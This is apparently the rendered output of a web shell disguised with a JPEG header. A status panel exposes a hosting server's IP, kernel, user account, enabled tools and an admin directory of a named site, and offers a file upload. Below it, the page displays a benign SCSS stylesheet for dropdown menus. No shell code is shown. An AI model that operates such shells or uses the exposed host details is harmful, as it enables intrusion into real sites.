���� JFIF adgknasdgsa
Server IP : 191.101.104.103 / Your IP : 3.145.49.72 Web Server : LiteSpeed System : Linux us-imm-web537.main-hosting.eu 4.18.0-513.11.1.lve.el7h.x86_64 #1 SMP Thu Jan 18 15:21:24 UTC 2024 x86_64 User : u547896322 ( 547896322) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u547896322/domains/amrutimba.com/public_html/admin/src/scss/3-components/ |
Upload File : |
.navbar-nav .dropdown-menu { box-shadow: $box-shadow; } .dropdown .dropdown-menu.show { animation-name: dropdownAnimation; animation-duration: .25s; animation-iteration-count: 1; animation-timing-function: ease; animation-fill-mode: forwards; } @keyframes dropdownAnimation { from { opacity: 0; transform: translateY(-8px); } to { opacity: 1; transform: translate(0); } } .dropdown-toggle:after { border: solid; border-width: 0 2px 2px 0; display: inline-block; padding: 2px; transform: rotate(45deg); } .dropdown-item { transition: $transition-appearance-fast; } .dropdown-menu { top: auto; } .dropdown-menu-lg { min-width: $dropdown-min-width*2; } .dropdown .list-group .list-group-item { border-width: 0; border-bottom-width: 1px; margin-bottom: 0; &:first-child, &:last-child { border-radius: 0; } &:hover { background: $gray-100; } } .dropdown-menu-header { padding: $spacer*0.75; text-align: center; font-weight: $font-weight-bold; border-bottom: 1px solid $gray-300; } .dropdown-menu-footer { padding: $spacer*0.5; text-align: center; display: block; font-size: $font-size-sm; }